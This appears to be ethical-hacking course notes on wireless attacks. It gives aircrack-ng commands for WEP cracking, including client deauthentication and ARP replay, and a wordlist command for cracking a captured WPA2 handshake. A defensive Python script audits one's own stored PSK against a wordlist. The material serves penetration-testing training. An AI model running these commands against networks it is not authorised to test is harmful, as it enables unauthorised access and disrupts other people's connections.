# 3. Perform Wireless Attacks

{% embed url="<https://rumble.com/embed/v6nqikc/?pub=4jw86f>" %}

## <mark style="color:red;">1. Crack WEP using Aircrack-ng</mark>

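```
# Put the wireless adapter into monitor mode
airmon-ng start wlan0
# Survey nearby networks, then capture the target channel to a file
airodump-ng (interface)
airodump-ng -w "filename" -c "channel name" (interface)
# Fake authentication with the access point
aireplay-ng -1 0 -a (bssid) -h (mac of your card) -e (essid) (interface)
# ARP request replay to generate IVs
aireplay-ng -3 -b "bssid" -h "mac address" (interface)
# Deauthenticate a connected client
aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0
# Recover the WEP key from the capture (-b takes the BSSID, not the file name)
aircrack-ng -b "bssid" "filename.cap"
```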

## <mark style="color:red;">2. Crack WEP using WifiPhisher</mark>

{% embed url="<https://github.com/wifiphisher/wifiphisher>" %}

## <mark style="color:red;">3. Crack WPA with FERN cracker</mark>

## 4. Crack WPA2 with Aircrack

WPA2 is an upgrade to WPA; it includes mandatory support for Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), an AES-based encryption protocol with strong security. WPA2 has two modes of operation: WPA2-Personal and WPA2-Enterprise. Despite being stronger than both WEP and WPA, the WPA2 encryption method can also be cracked using various techniques and tools.

In this task, we will use the Aircrack-ng suite to crack a WPA2 network.

```
aircrack-ng -a2 -b [Target BSSID] -w /home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample Captures/WPA2crack-01.cap'
```

* **-a** forces the attack mode used against the handshake; **2** selects WPA/WPA2-PSK.
* **-b** refers to bssid; replace with the BSSID of the target router.
* **-w** stands for wordlist; provide the path to a wordlist.

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2F1tTVKuPjnron6R9aKL02%2Fimage.png?alt=media&#x26;token=b93502e6-0153-4189-bc6e-3ac074158e89" alt=""><figcaption></figcaption></figure>

The result appears, showing the WPA handshake packet captured with airodump-ng. The target access point’s password is cracked and displayed in plain text next to the message **KEY FOUND!**, as shown in the screenshot.

<figure><img src="https://2218819509-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrUBnODuUX4EQ8P27uc5D%2Fuploads%2FLhnOrX9cD26fSlUNeJqu%2Fimage.png?alt=media&#x26;token=aebe6743-c2d5-445b-abf1-edb009d5db6d" alt=""><figcaption></figcaption></figure>

{% embed url="<https://hackingplayground.blogspot.com/2022/07/hacking-wifi-networks-with-aircrack.html>" %}
Full tutorial
{% endembed %}

You can also use other tools such as **hashcat** (<https://hashcat.net>), **Portable Penetrator** (<https://www.secpoint.com>), and **WepCrackGui** (<https://sourceforge.net>) to crack WEP/WPA/WPA2 encryption.
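
The wordlist run above succeeds whenever the passphrase is guessable, because the WPA2-Personal key is derived only from the passphrase and the SSID (PBKDF2-HMAC-SHA1, 4096 iterations, SSID as salt). As an added example that is not part of the original page, this Python script audits a PSK stored as 64 hex digits in your own access point or supplicant configuration against a wordlist; `SAMPLE_WORDLIST`, `derive_pmk` and `audit_stored_psk` are hypothetical names and all inputs are constructed.

```python
import hashlib
import hmac

# Constructed sample standing in for a wordlist file such as password.txt.
SAMPLE_WORDLIST = ["admin", "12345678", "qwertyuiop", "password", "letmein123"]


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32
    )


def audit_stored_psk(ssid: str, psk_hex: str, wordlist) -> dict:
    """Check a hex PSK taken from your own configuration against a wordlist."""
    target = bytes.fromhex(psk_hex)
    if len(target) != 32:
        raise ValueError("expected a 256-bit PSK (64 hex digits)")
    tried = 0
    for word in wordlist:
        word = word.strip()
        if not 8 <= len(word) <= 63:  # not a valid WPA2 passphrase length, skip
            continue
        tried += 1
        if hmac.compare_digest(derive_pmk(word, ssid), target):
            return {"weak": True, "passphrase": word, "tried": tried}
    return {"weak": False, "passphrase": None, "tried": tried}


if __name__ == "__main__":
    # Constructed input: SSID "IEEE" configured with the passphrase "password".
    stored = derive_pmk("password", "IEEE").hex()
    print(audit_stored_psk("IEEE", stored, SAMPLE_WORDLIST))
    # The SSID is the salt, so the same passphrase yields a different key elsewhere.
    print(derive_pmk("password", "IEEE") != derive_pmk("password", "HomeNet"))
```

A match means the configured passphrase would also fall to the wordlist run shown above; replace it with a long random value that appears in no wordlist.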

## <mark style="color:red;">5. Create a Rogue Access Point</mark>

{% embed url="<https://www.udemy.com/course/ethical-hacker-practical/?referralCode=289CF01CF51246BCAD6C>" %}
